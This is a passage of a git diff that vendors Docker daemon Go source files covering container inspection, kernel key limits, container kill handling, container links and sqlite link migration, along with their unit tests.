nil +} + +func addMountPoints(container *container.Container) []types.MountPoint { + mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) + for _, m := range container.MountPoints { + mountPoints = append(mountPoints, types.MountPoint{ + Name: m.Name, + Source: m.Path(), + Destination: m.Destination, + Driver: m.Driver, + RW: m.RW, + }) + } + return mountPoints +} + +func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig { + return &backend.ExecProcessConfig{ + Tty: e.Tty, + Entrypoint: e.Entrypoint, + Arguments: e.Args, + } +} diff --git a/vendor/github.com/docker/docker/daemon/inspect_unix.go b/vendor/github.com/docker/docker/daemon/inspect_unix.go new file mode 100644 index 0000000000..08a82235ad --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/inspect_unix.go @@ -0,0 +1,92 @@ +// +build !windows,!solaris + +package daemon + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/versions/v1p19" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" +) + +// This sets platform-specific fields +func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase { + contJSONBase.AppArmorProfile = container.AppArmorProfile + contJSONBase.ResolvConfPath = container.ResolvConfPath + contJSONBase.HostnamePath = container.HostnamePath + contJSONBase.HostsPath = container.HostsPath + + return contJSONBase +} + +// containerInspectPre120 gets containers for pre 1.20 APIs. +func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + container.Lock() + defer container.Unlock() + + base, err := daemon.getInspectData(container, false) + if err != nil { + return nil, err + } + + volumes := make(map[string]string) + volumesRW := make(map[string]bool) + for _, m := range container.MountPoints { + volumes[m.Destination] = m.Path() + volumesRW[m.Destination] = m.RW + } + + config := &v1p19.ContainerConfig{ + Config: container.Config, + MacAddress: container.Config.MacAddress, + NetworkDisabled: container.Config.NetworkDisabled, + ExposedPorts: container.Config.ExposedPorts, + VolumeDriver: container.HostConfig.VolumeDriver, + Memory: container.HostConfig.Memory, + MemorySwap: container.HostConfig.MemorySwap, + CPUShares: container.HostConfig.CPUShares, + CPUSet: container.HostConfig.CpusetCpus, + } + networkSettings := daemon.getBackwardsCompatibleNetworkSettings(container.NetworkSettings) + + return &v1p19.ContainerJSON{ + ContainerJSONBase: base, + Volumes: volumes, + VolumesRW: volumesRW, + Config: config, + NetworkSettings: networkSettings, + }, nil +} + +func addMountPoints(container *container.Container) []types.MountPoint { + mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) + for _, m := range container.MountPoints { + mountPoints = append(mountPoints, types.MountPoint{ + Type: m.Type, + Name: m.Name, + Source: m.Path(), + Destination: m.Destination, + Driver: m.Driver, + Mode: m.Mode, + RW: m.RW, + Propagation: m.Propagation, + }) + } + return mountPoints +} + +func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig { + return &backend.ExecProcessConfig{ + Tty: e.Tty, + Entrypoint: e.Entrypoint, + Arguments: e.Args, + Privileged: &e.Privileged, + User: e.User, + } +} diff --git a/vendor/github.com/docker/docker/daemon/inspect_windows.go b/vendor/github.com/docker/docker/daemon/inspect_windows.go new file mode 100644 index 0000000000..b331c83ca3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/inspect_windows.go @@ -0,0 +1,41 @@ +package daemon + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" +) + +// This sets platform-specific fields +func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase { + return contJSONBase +} + +func addMountPoints(container *container.Container) []types.MountPoint { + mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) + for _, m := range container.MountPoints { + mountPoints = append(mountPoints, types.MountPoint{ + Type: m.Type, + Name: m.Name, + Source: m.Path(), + Destination: m.Destination, + Driver: m.Driver, + RW: m.RW, + }) + } + return mountPoints +} + +// containerInspectPre120 get containers for pre 1.20 APIs. +func (daemon *Daemon) containerInspectPre120(name string) (*types.ContainerJSON, error) { + return daemon.ContainerInspectCurrent(name, false) +} + +func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig { + return &backend.ExecProcessConfig{ + Tty: e.Tty, + Entrypoint: e.Entrypoint, + Arguments: e.Args, + } +} diff --git a/vendor/github.com/docker/docker/daemon/keys.go b/vendor/github.com/docker/docker/daemon/keys.go new file mode 100644 index 0000000000..055d488a5d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/keys.go @@ -0,0 +1,59 @@ +// +build linux + +package daemon + +import ( + "fmt" + "io/ioutil" + "os" + "strconv" + "strings" +) + +const ( + rootKeyFile = "/proc/sys/kernel/keys/root_maxkeys" + rootBytesFile = "/proc/sys/kernel/keys/root_maxbytes" + rootKeyLimit = 1000000 + // it is standard configuration to allocate 25 bytes per key + rootKeyByteMultiplier = 25 +) + +// ModifyRootKeyLimit checks to see if the root key limit is set to +// at least 1000000 and changes it to that limit along with the maxbytes +// allocated to the keys at a 25 to 1 multiplier. +func ModifyRootKeyLimit() error { + value, err := readRootKeyLimit(rootKeyFile) + if err != nil { + return err + } + if value < rootKeyLimit { + return setRootKeyLimit(rootKeyLimit) + } + return nil +} + +func setRootKeyLimit(limit int) error { + keys, err := os.OpenFile(rootKeyFile, os.O_WRONLY, 0) + if err != nil { + return err + } + defer keys.Close() + if _, err := fmt.Fprintf(keys, "%d", limit); err != nil { + return err + } + bytes, err := os.OpenFile(rootBytesFile, os.O_WRONLY, 0) + if err != nil { + return err + } + defer bytes.Close() + _, err = fmt.Fprintf(bytes, "%d", limit*rootKeyByteMultiplier) + return err +} + +func readRootKeyLimit(path string) (int, error) { + data, err := ioutil.ReadFile(path) + if err != nil { + return -1, err + } + return strconv.Atoi(strings.Trim(string(data), "\n")) +} diff --git a/vendor/github.com/docker/docker/daemon/keys_unsupported.go b/vendor/github.com/docker/docker/daemon/keys_unsupported.go new file mode 100644 index 0000000000..b17255940a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/keys_unsupported.go @@ -0,0 +1,8 @@ +// +build !linux + +package daemon + +// ModifyRootKeyLimit is an noop on unsupported platforms. +func ModifyRootKeyLimit() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/kill.go b/vendor/github.com/docker/docker/daemon/kill.go new file mode 100644 index 0000000000..18d5bbb4e5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/kill.go @@ -0,0 +1,164 @@ +package daemon + +import ( + "fmt" + "runtime" + "strings" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/signal" +) + +type errNoSuchProcess struct { + pid int + signal int +} + +func (e errNoSuchProcess) Error() string { + return fmt.Sprintf("Cannot kill process (pid=%d) with signal %d: no such process.", e.pid, e.signal) +} + +// isErrNoSuchProcess returns true if the error +// is an instance of errNoSuchProcess. +func isErrNoSuchProcess(err error) bool { + _, ok := err.(errNoSuchProcess) + return ok +} + +// ContainerKill sends signal to the container +// If no signal is given (sig 0), then Kill with SIGKILL and wait +// for the container to exit. +// If a signal is given, then just send it to the container and return. +func (daemon *Daemon) ContainerKill(name string, sig uint64) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if sig != 0 && !signal.ValidSignalForPlatform(syscall.Signal(sig)) { + return fmt.Errorf("The %s daemon does not support signal %d", runtime.GOOS, sig) + } + + // If no signal is passed, or SIGKILL, perform regular Kill (SIGKILL + wait()) + if sig == 0 || syscall.Signal(sig) == syscall.SIGKILL { + return daemon.Kill(container) + } + return daemon.killWithSignal(container, int(sig)) +} + +// killWithSignal sends the container the given signal. This wrapper for the +// host specific kill command prepares the container before attempting +// to send the signal. An error is returned if the container is paused +// or not running, or if there is a problem returned from the +// underlying kill command. +func (daemon *Daemon) killWithSignal(container *container.Container, sig int) error { + logrus.Debugf("Sending kill signal %d to container %s", sig, container.ID) + container.Lock() + defer container.Unlock() + + // We could unpause the container for them rather than returning this error + if container.Paused { + return fmt.Errorf("Container %s is paused. Unpause the container before stopping", container.ID) + } + + if !container.Running { + return errNotRunning{container.ID} + } + + if container.Config.StopSignal != "" { + containerStopSignal, err := signal.ParseSignal(container.Config.StopSignal) + if err != nil { + return err + } + if containerStopSignal == syscall.Signal(sig) { + container.ExitOnNext() + } + } else { + container.ExitOnNext() + } + + if !daemon.IsShuttingDown() { + container.HasBeenManuallyStopped = true + } + + // if the container is currently restarting we do not need to send the signal + // to the process. Telling the monitor that it should exit on its next event + // loop is enough + if container.Restarting { + return nil + } + + if err := daemon.kill(container, sig); err != nil { + err = fmt.Errorf("Cannot kill container %s: %s", container.ID, err) + // if container or process not exists, ignore the error + if strings.Contains(err.Error(), "container not found") || + strings.Contains(err.Error(), "no such process") { + logrus.Warnf("container kill failed because of 'container not found' or 'no such process': %s", err.Error()) + } else { + return err + } + } + + attributes := map[string]string{ + "signal": fmt.Sprintf("%d", sig), + } + daemon.LogContainerEventWithAttributes(container, "kill", attributes) + return nil +} + +// Kill forcefully terminates a container. +func (daemon *Daemon) Kill(container *container.Container) error { + if !container.IsRunning() { + return errNotRunning{container.ID} + } + + // 1. Send SIGKILL + if err := daemon.killPossiblyDeadProcess(container, int(syscall.SIGKILL)); err != nil { + // While normally we might "return err" here we're not going to + // because if we can't stop the container by this point then + // its probably because its already stopped. Meaning, between + // the time of the IsRunning() call above and now it stopped. + // Also, since the err return will be environment specific we can't + // look for any particular (common) error that would indicate + // that the process is already dead vs something else going wrong. + // So, instead we'll give it up to 2 more seconds to complete and if + // by that time the container is still running, then the error + // we got is probably valid and so we return it to the caller. + if isErrNoSuchProcess(err) { + return nil + } + + if _, err2 := container.WaitStop(2 * time.Second); err2 != nil { + return err + } + } + + // 2. Wait for the process to die, in last resort, try to kill the process directly + if err := killProcessDirectly(container); err != nil { + if isErrNoSuchProcess(err) { + return nil + } + return err + } + + container.WaitStop(-1 * time.Second) + return nil +} + +// killPossibleDeadProcess is a wrapper around killSig() suppressing "no such process" error. +func (daemon *Daemon) killPossiblyDeadProcess(container *container.Container, sig int) error { + err := daemon.killWithSignal(container, sig) + if err == syscall.ESRCH { + e := errNoSuchProcess{container.GetPID(), sig} + logrus.Debug(e) + return e + } + return err +} + +func (daemon *Daemon) kill(c *container.Container, sig int) error { + return daemon.containerd.Signal(c.ID, sig) +} diff --git a/vendor/github.com/docker/docker/daemon/links.go b/vendor/github.com/docker/docker/daemon/links.go new file mode 100644 index 0000000000..7f691d4f16 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links.go @@ -0,0 +1,87 @@ +package daemon + +import ( + "sync" + + "github.com/docker/docker/container" +) + +// linkIndex stores link relationships between containers, including their specified alias +// The alias is the name the parent uses to reference the child +type linkIndex struct { + // idx maps a parent->alias->child relationship + idx map[*container.Container]map[string]*container.Container + // childIdx maps child->parent->aliases + childIdx map[*container.Container]map[*container.Container]map[string]struct{} + mu sync.Mutex +} + +func newLinkIndex() *linkIndex { + return &linkIndex{ + idx: make(map[*container.Container]map[string]*container.Container), + childIdx: make(map[*container.Container]map[*container.Container]map[string]struct{}), + } +} + +// link adds indexes for the passed in parent/child/alias relationships +func (l *linkIndex) link(parent, child *container.Container, alias string) { + l.mu.Lock() + + if l.idx[parent] == nil { + l.idx[parent] = make(map[string]*container.Container) + } + l.idx[parent][alias] = child + if l.childIdx[child] == nil { + l.childIdx[child] = make(map[*container.Container]map[string]struct{}) + } + if l.childIdx[child][parent] == nil { + l.childIdx[child][parent] = make(map[string]struct{}) + } + l.childIdx[child][parent][alias] = struct{}{} + + l.mu.Unlock() +} + +// unlink removes the requested alias for the given parent/child +func (l *linkIndex) unlink(alias string, child, parent *container.Container) { + l.mu.Lock() + delete(l.idx[parent], alias) + delete(l.childIdx[child], parent) + l.mu.Unlock() +} + +// children maps all the aliases-> children for the passed in parent +// aliases here are the aliases the parent uses to refer to the child +func (l *linkIndex) children(parent *container.Container) map[string]*container.Container { + l.mu.Lock() + children := l.idx[parent] + l.mu.Unlock() + return children +} + +// parents maps all the aliases->parent for the passed in child +// aliases here are the aliases the parents use to refer to the child +func (l *linkIndex) parents(child *container.Container) map[string]*container.Container { + l.mu.Lock() + + parents := make(map[string]*container.Container) + for parent, aliases := range l.childIdx[child] { + for alias := range aliases { + parents[alias] = parent + } + } + + l.mu.Unlock() + return parents +} + +// delete deletes all link relationships referencing this container +func (l *linkIndex) delete(container *container.Container) { + l.mu.Lock() + for _, child := range l.idx[container] { + delete(l.childIdx[child], container) + } + delete(l.idx, container) + delete(l.childIdx, container) + l.mu.Unlock() +} diff --git a/vendor/github.com/docker/docker/daemon/links/links.go b/vendor/github.com/docker/docker/daemon/links/links.go new file mode 100644 index 0000000000..af15de046d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links/links.go @@ -0,0 +1,141 @@ +package links + +import ( + "fmt" + "path" + "strings" + + "github.com/docker/go-connections/nat" +) + +// Link struct holds informations about parent/child linked container +type Link struct { + // Parent container IP address + ParentIP string + // Child container IP address + ChildIP string + // Link name + Name string + // Child environments variables + ChildEnvironment []string + // Child exposed ports + Ports []nat.Port +} + +// NewLink initializes a new Link struct with the provided options. +func NewLink(parentIP, childIP, name string, env []string, exposedPorts map[nat.Port]struct{}) *Link { + var ( + i int + ports = make([]nat.Port, len(exposedPorts)) + ) + + for p := range exposedPorts { + ports[i] = p + i++ + } + + return &Link{ + Name: name, + ChildIP: childIP, + ParentIP: parentIP, + ChildEnvironment: env, + Ports: ports, + } +} + +// ToEnv creates a string's slice containing child container informations in +// the form of environment variables which will be later exported on container +// startup. +func (l *Link) ToEnv() []string { + env := []string{} + + _, n := path.Split(l.Name) + alias := strings.Replace(strings.ToUpper(n), "-", "_", -1) + + if p := l.getDefaultPort(); p != nil { + env = append(env, fmt.Sprintf("%s_PORT=%s://%s:%s", alias, p.Proto(), l.ChildIP, p.Port())) + } + + //sort the ports so that we can bulk the continuous ports together + nat.Sort(l.Ports, func(ip, jp nat.Port) bool { + // If the two ports have the same number, tcp takes priority + // Sort in desc order + return ip.Int() < jp.Int() || (ip.Int() == jp.Int() && strings.ToLower(ip.Proto()) == "tcp") + }) + + for i := 0; i < len(l.Ports); { + p := l.Ports[i] + j := nextContiguous(l.Ports, p.Int(), i) + if j > i+1 { + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_START=%s://%s:%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Proto(), l.ChildIP, p.Port())) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_ADDR=%s", alias, p.Port(), strings.ToUpper(p.Proto()), l.ChildIP)) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PROTO=%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Proto())) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PORT_START=%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Port())) + + q := l.Ports[j] + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_END=%s://%s:%s", alias, p.Port(), strings.ToUpper(q.Proto()), q.Proto(), l.ChildIP, q.Port())) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PORT_END=%s", alias, p.Port(), strings.ToUpper(q.Proto()), q.Port())) + + i = j + 1 + continue + } else { + i++ + } + } + for _, p := range l.Ports { + env = append(env, fmt.Sprintf("%s_PORT_%s_%s=%s://%s:%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Proto(), l.ChildIP, p.Port())) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_ADDR=%s", alias, p.Port(), strings.ToUpper(p.Proto()), l.ChildIP)) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PORT=%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Port())) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PROTO=%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Proto())) + } + + // Load the linked container's name into the environment + env = append(env, fmt.Sprintf("%s_NAME=%s", alias, l.Name)) + + if l.ChildEnvironment != nil { + for _, v := range l.ChildEnvironment { + parts := strings.SplitN(v, "=", 2) + if len(parts) < 2 { + continue + } + // Ignore a few variables that are added during docker build (and not really relevant to linked containers) + if parts[0] == "HOME" || parts[0] == "PATH" { + continue + } + env = append(env, fmt.Sprintf("%s_ENV_%s=%s", alias, parts[0], parts[1])) + } + } + return env +} + +func nextContiguous(ports []nat.Port, value int, index int) int { + if index+1 == len(ports) { + return index + } + for i := index + 1; i < len(ports); i++ { + if ports[i].Int() > value+1 { + return i - 1 + } + + value++ + } + return len(ports) - 1 +} + +// Default port rules +func (l *Link) getDefaultPort() *nat.Port { + var p nat.Port + i := len(l.Ports) + + if i == 0 { + return nil + } else if i > 1 { + nat.Sort(l.Ports, func(ip, jp nat.Port) bool { + // If the two ports have the same number, tcp takes priority + // Sort in desc order + return ip.Int() < jp.Int() || (ip.Int() == jp.Int() && strings.ToLower(ip.Proto()) == "tcp") + }) + } + p = l.Ports[0] + return &p +} diff --git a/vendor/github.com/docker/docker/daemon/links/links_test.go b/vendor/github.com/docker/docker/daemon/links/links_test.go new file mode 100644 index 0000000000..0273f13cf0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links/links_test.go @@ -0,0 +1,213 @@ +package links + +import ( + "fmt" + "strings" + "testing" + + "github.com/docker/go-connections/nat" +) + +// Just to make life easier +func newPortNoError(proto, port string) nat.Port { + p, _ := nat.NewPort(proto, port) + return p +} + +func TestLinkNaming(t *testing.T) { + ports := make(nat.PortSet) + ports[newPortNoError("tcp", "6379")] = struct{}{} + + link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker-1", nil, ports) + + rawEnv := link.ToEnv() + env := make(map[string]string, len(rawEnv)) + for _, e := range rawEnv { + parts := strings.Split(e, "=") + if len(parts) != 2 { + t.FailNow() + } + env[parts[0]] = parts[1] + } + + value, ok := env["DOCKER_1_PORT"] + + if !ok { + t.Fatalf("DOCKER_1_PORT not found in env") + } + + if value != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_1_PORT"]) + } +} + +func TestLinkNew(t *testing.T) { + ports := make(nat.PortSet) + ports[newPortNoError("tcp", "6379")] = struct{}{} + + link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", nil, ports) + + if link.Name != "/db/docker" { + t.Fail() + } + if link.ParentIP != "172.0.17.3" { + t.Fail() + } + if link.ChildIP != "172.0.17.2" { + t.Fail() + } + for _, p := range link.Ports { + if p != newPortNoError("tcp", "6379") { + t.Fail() + } + } +} + +func TestLinkEnv(t *testing.T) { + ports := make(nat.PortSet) + ports[newPortNoError("tcp", "6379")] = struct{}{} + + link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", []string{"PASSWORD=gordon"}, ports) + + rawEnv := link.ToEnv() + env := make(map[string]string, len(rawEnv)) + for _, e := range rawEnv { + parts := strings.Split(e, "=") + if len(parts) != 2 { + t.FailNow() + } + env[parts[0]] = parts[1] + } + if env["DOCKER_PORT"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_PORT"]) + } + if env["DOCKER_PORT_6379_TCP"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected tcp://172.0.17.2:6379, got %s", env["DOCKER_PORT_6379_TCP"]) + } + if env["DOCKER_PORT_6379_TCP_PROTO"] != "tcp" { + t.Fatalf("Expected tcp, got %s", env["DOCKER_PORT_6379_TCP_PROTO"]) + } + if env["DOCKER_PORT_6379_TCP_ADDR"] != "172.0.17.2" { + t.Fatalf("Expected 172.0.17.2, got %s", env["DOCKER_PORT_6379_TCP_ADDR"]) + } + if env["DOCKER_PORT_6379_TCP_PORT"] != "6379" { + t.Fatalf("Expected 6379, got %s", env["DOCKER_PORT_6379_TCP_PORT"]) + } + if env["DOCKER_NAME"] != "/db/docker" { + t.Fatalf("Expected /db/docker, got %s", env["DOCKER_NAME"]) + } + if env["DOCKER_ENV_PASSWORD"] != "gordon" { + t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"]) + } +} + +func TestLinkMultipleEnv(t *testing.T) { + ports := make(nat.PortSet) + ports[newPortNoError("tcp", "6379")] = struct{}{} + ports[newPortNoError("tcp", "6380")] = struct{}{} + ports[newPortNoError("tcp", "6381")] = struct{}{} + + link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", []string{"PASSWORD=gordon"}, ports) + + rawEnv := link.ToEnv() + env := make(map[string]string, len(rawEnv)) + for _, e := range rawEnv { + parts := strings.Split(e, "=") + if len(parts) != 2 { + t.FailNow() + } + env[parts[0]] = parts[1] + } + if env["DOCKER_PORT"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_PORT"]) + } + if env["DOCKER_PORT_6379_TCP_START"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected tcp://172.0.17.2:6379, got %s", env["DOCKER_PORT_6379_TCP_START"]) + } + if env["DOCKER_PORT_6379_TCP_END"] != "tcp://172.0.17.2:6381" { + t.Fatalf("Expected tcp://172.0.17.2:6381, got %s", env["DOCKER_PORT_6379_TCP_END"]) + } + if env["DOCKER_PORT_6379_TCP_PROTO"] != "tcp" { + t.Fatalf("Expected tcp, got %s", env["DOCKER_PORT_6379_TCP_PROTO"]) + } + if env["DOCKER_PORT_6379_TCP_ADDR"] != "172.0.17.2" { + t.Fatalf("Expected 172.0.17.2, got %s", env["DOCKER_PORT_6379_TCP_ADDR"]) + } + if env["DOCKER_PORT_6379_TCP_PORT_START"] != "6379" { + t.Fatalf("Expected 6379, got %s", env["DOCKER_PORT_6379_TCP_PORT_START"]) + } + if env["DOCKER_PORT_6379_TCP_PORT_END"] != "6381" { + t.Fatalf("Expected 6381, got %s", env["DOCKER_PORT_6379_TCP_PORT_END"]) + } + if env["DOCKER_NAME"] != "/db/docker" { + t.Fatalf("Expected /db/docker, got %s", env["DOCKER_NAME"]) + } + if env["DOCKER_ENV_PASSWORD"] != "gordon" { + t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"]) + } +} + +func TestLinkPortRangeEnv(t *testing.T) { + ports := make(nat.PortSet) + ports[newPortNoError("tcp", "6379")] = struct{}{} + ports[newPortNoError("tcp", "6380")] = struct{}{} + ports[newPortNoError("tcp", "6381")] = struct{}{} + + link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", []string{"PASSWORD=gordon"}, ports) + + rawEnv := link.ToEnv() + env := make(map[string]string, len(rawEnv)) + for _, e := range rawEnv { + parts := strings.Split(e, "=") + if len(parts) != 2 { + t.FailNow() + } + env[parts[0]] = parts[1] + } + + if env["DOCKER_PORT"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_PORT"]) + } + if env["DOCKER_PORT_6379_TCP_START"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected tcp://172.0.17.2:6379, got %s", env["DOCKER_PORT_6379_TCP_START"]) + } + if env["DOCKER_PORT_6379_TCP_END"] != "tcp://172.0.17.2:6381" { + t.Fatalf("Expected tcp://172.0.17.2:6381, got %s", env["DOCKER_PORT_6379_TCP_END"]) + } + if env["DOCKER_PORT_6379_TCP_PROTO"] != "tcp" { + t.Fatalf("Expected tcp, got %s", env["DOCKER_PORT_6379_TCP_PROTO"]) + } + if env["DOCKER_PORT_6379_TCP_ADDR"] != "172.0.17.2" { + t.Fatalf("Expected 172.0.17.2, got %s", env["DOCKER_PORT_6379_TCP_ADDR"]) + } + if env["DOCKER_PORT_6379_TCP_PORT_START"] != "6379" { + t.Fatalf("Expected 6379, got %s", env["DOCKER_PORT_6379_TCP_PORT_START"]) + } + if env["DOCKER_PORT_6379_TCP_PORT_END"] != "6381" { + t.Fatalf("Expected 6381, got %s", env["DOCKER_PORT_6379_TCP_PORT_END"]) + } + if env["DOCKER_NAME"] != "/db/docker" { + t.Fatalf("Expected /db/docker, got %s", env["DOCKER_NAME"]) + } + if env["DOCKER_ENV_PASSWORD"] != "gordon" { + t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"]) + } + for i := range []int{6379, 6380, 6381} { + tcpaddr := fmt.Sprintf("DOCKER_PORT_%d_TCP_ADDR", i) + tcpport := fmt.Sprintf("DOCKER_PORT_%d_TCP+PORT", i) + tcpproto := fmt.Sprintf("DOCKER_PORT_%d_TCP+PROTO", i) + tcp := fmt.Sprintf("DOCKER_PORT_%d_TCP", i) + if env[tcpaddr] == "172.0.17.2" { + t.Fatalf("Expected env %s = 172.0.17.2, got %s", tcpaddr, env[tcpaddr]) + } + if env[tcpport] == fmt.Sprintf("%d", i) { + t.Fatalf("Expected env %s = %d, got %s", tcpport, i, env[tcpport]) + } + if env[tcpproto] == "tcp" { + t.Fatalf("Expected env %s = tcp, got %s", tcpproto, env[tcpproto]) + } + if env[tcp] == fmt.Sprintf("tcp://172.0.17.2:%d", i) { + t.Fatalf("Expected env %s = tcp://172.0.17.2:%d, got %s", tcp, i, env[tcp]) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/links_linux.go b/vendor/github.com/docker/docker/daemon/links_linux.go new file mode 100644 index 0000000000..2ea40d9e51 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links_linux.go @@ -0,0 +1,72 @@ +package daemon + +import ( + "fmt" + "path/filepath" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/graphdb" +) + +// migrateLegacySqliteLinks migrates sqlite links to use links from HostConfig +// when sqlite links were used, hostConfig.Links was set to nil +func (daemon *Daemon) migrateLegacySqliteLinks(db *graphdb.Database, container *container.Container) error { + // if links is populated (or an empty slice), then this isn't using sqlite links and can be skipped + if container.HostConfig == nil || container.HostConfig.Links != nil { + return nil + } + + logrus.Debugf("migrating legacy sqlite link info for container: %s", container.ID) + + fullName := container.Name + if fullName[0] != '/' { + fullName = "/" + fullName + } + + // don't use a nil slice, this ensures that the check above will skip once the migration has completed + links := []string{} + children, err := db.Children(fullName, 0) + if err != nil { + if !strings.Contains(err.Error(), "Cannot find child for") { + return err + } + // else continue... it's ok if we didn't find any children, it'll just be nil and we can continue the migration + } + + for _, child := range children { + c, err := daemon.GetContainer(child.Entity.ID()) + if err != nil { + return err + } + + links = append(links, c.Name+":"+child.Edge.Name) + } + + container.HostConfig.Links = links + return container.WriteHostConfig() +} + +// sqliteMigration performs the link graph DB migration. +func (daemon *Daemon) sqliteMigration(containers map[string]*container.Container) error { + // migrate any legacy links from sqlite + linkdbFile := filepath.Join(daemon.root, "linkgraph.db") + var ( + legacyLinkDB *graphdb.Database + err error + ) + + legacyLinkDB, err = graphdb.NewSqliteConn(linkdbFile) + if err != nil { + return fmt.Errorf("error connecting to legacy link graph DB %s, container links may be lost: %v", linkdbFile, err) + } + defer legacyLinkDB.Close() + + for _, c := range containers { + if err := daemon.migrateLegacySqliteLinks(legacyLinkDB, c); err != nil { + return err + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/links_linux_test.go b/vendor/github.com/docker/docker/daemon/links_linux_test.go new file mode 100644 index 0000000000..e2dbff2d25 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links_linux_test.go @@ -0,0 +1,98 @@ +package daemon + +import ( + "encoding/json" + "io/ioutil" + "os" + "path" + "path/filepath" + "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/graphdb" + "github.com/docker/docker/pkg/stringid" +) + +func TestMigrateLegacySqliteLinks(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "legacy-qlite-links-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + name1 := "test1" + c1 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: stringid.GenerateNonCryptoID(), + Name: name1, + HostConfig: &containertypes.HostConfig{}, + }, + } + c1.Root = tmpDir + + name2 := "test2" + c2 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: stringid.GenerateNonCryptoID(), + Name: name2, + }, + } + + store := container.NewMemoryStore() + store.Add(c1.ID, c1) + store.Add(c2.ID, c2) + + d := &Daemon{root: tmpDir, containers: store} + db, err := graphdb.NewSqliteConn(filepath.Join(d.root, "linkgraph.db")) + if err != nil { + t.Fatal(err) + } + + if _, err := db.Set("/"+name1, c1.ID); err != nil { + t.Fatal(err) + } + + if _, err := db.Set("/"+name2, c2.ID); err != nil { + t.Fatal(err) + } + + alias := "hello" + if _, err := db.Set(path.Join(c1.Name, alias), c2.ID); err != nil { + t.Fatal(err) + } + + if err := d.migrateLegacySqliteLinks(db, c1); err != nil { + t.Fatal(err) + } + + if len(c1.HostConfig.Links) != 1 { + t.Fatal("expected links to be populated but is empty") + } + + expected := name2 + ":" + alias + actual := c1.HostConfig.Links[0] + if actual != expected { + t.Fatalf("got wrong link value, expected: %q, got: %q", expected, actual) + } + + // ensure this is persisted + b, err := ioutil.ReadFile(filepath.Join(c1.Root, "hostconfig.json")) + if err != nil { + t.Fatal(err) + } + type hc struct { + Links []string + } + var cfg hc + if err := json.Unmarshal(b, &cfg); err != nil { + t.Fatal(err) + } + + if len(cfg.Links) != 1 { + t.Fatalf("expected one entry in links, got: %d", len(cfg.Links)) + } + if cfg.Links[0] != expected { // same expected as above + t.Fatalf("got wrong link value, expected: %q, got: %q", expected, cfg.Links[0]) + } +} diff --git a/vendor/github.com/docker/docker/daemon/links_notlinux.go b/vendor/github.com/docker/docker/daemon/links_notlinux.go new file mode 100644 index 0000000000..12c226cfac --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links_notlinux.go 